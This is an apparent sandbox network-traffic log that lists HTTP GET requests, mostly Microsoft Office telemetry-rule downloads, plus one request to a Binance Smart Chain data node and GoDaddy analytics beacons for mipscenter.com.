Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: bsc-dataseed.binance.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120600v5s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /t/1/tl/event?dh=mipscenter.com&dr=&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F134.0.0.0%20Safari%2F537.36&client_name=scc-c2&cv=1.0.4&vg=a448cdd8-0a30-490d-9777-f465e4a15f12&vtg=a448cdd8-0a30-490d-9777-f465e4a15f12&dp=%2F&trace_id=0ec95676ece04a048b96bc82725e1f96&cts=2025-03-27T21%3A45%3A24.216Z&hit_id=53c9a380-9256-47e0-b707-741cb8185818&ea=pageperf&ht=perf&eid=traffic.tcc.instrumentation.navigation.timing&trfd=%7B%22ap%22%3A%22wpaas_v2%22%2C%22server%22%3A%22606446c11e48%22%2C%22pod%22%3A%22c8-prod-p3-us-west-2%22%2C%22xid%22%3A%2245774621%22%2C%22wp%22%3A%226.7.2%22%2C%22php%22%3A%227.4.33.9%22%2C%22loggedin%22%3A%220%22%2C%22cdn%22%3A%221%22%2C%22builder%22%3A%22wp-classic-editor%22%2C%22theme%22%3A%22milo%22%2C%22wds%22%3A%220%22%2C%22wp_alloptions_count%22%3A%22503%22%2C%22wp_alloptions_bytes%22%3A%22153255%22%2C%22gdl_coming_soon_page%22%3A%220%22%2C%22appid%22%3A%2262671%22%7D&ap=wpaas_v2&vci=1552567263&z=479057452&LCP=6232&CLS=0.4831717437056692&timeToInteractive=10740&nav_type=hard HTTP/1.1Host: events.api.secureserver.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://mipscenter.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /t/1/tl/event?dh=mipscenter.com&dr=&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F134.0.0.0%20Safari%2F537.36&client_name=scc-c2&cv=1.0.4&vg=a448cdd8-0a30-490d-9777-f465e4a15f12&vtg=a448cdd8-0a30-490d-9777-f465e4a15f12&dp=%2F&trace_id=0ec95676ece04a048b96bc82725e1f96&cts=2025-03-27T21%3A45%3A24.216Z&hit_id=53c9a380-9256-47e0-b707-741cb8185818&ea=pageperf&ht=perf&eid=traffic.tcc.instrumentation.navigation.timing&trfd=%7B%22ap%22%3A%22wpaas_v2%22%2C%22server%22%3A%22606446c11e48%22%2C%22pod%22%3A%22c8-prod-p3-us-west-2%22%2C%22xid%22%3A%2245774621%22%2C%22wp%22%3A%226.7.2%22%2C%22php%22%3A%227.4.33.9%22%2C%22loggedin%22%3A%220%22%2C%22cdn%22%3A%221%22%2C%22builder%22%3A%22wp-classic-editor%22%2C%22theme%22%3A%22milo%22%2C%22wds%22%3A%220%22%2C%22wp_alloptions_count%22%3A%22503%22%2C%22wp_alloptions_bytes%22%3A%22153255%22%2C%22gdl_coming_soon_page%22%3A%220%22%2C%22appid%22%3A%2262671%22%7D&ap=wpaas_v2&vci=1552567263&z=479057452&LCP=6232&CLS=0.4831717437056692&timeToInteractive=10740&nav_type=hard HTTP/1.1Host: events.api.secureserver.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
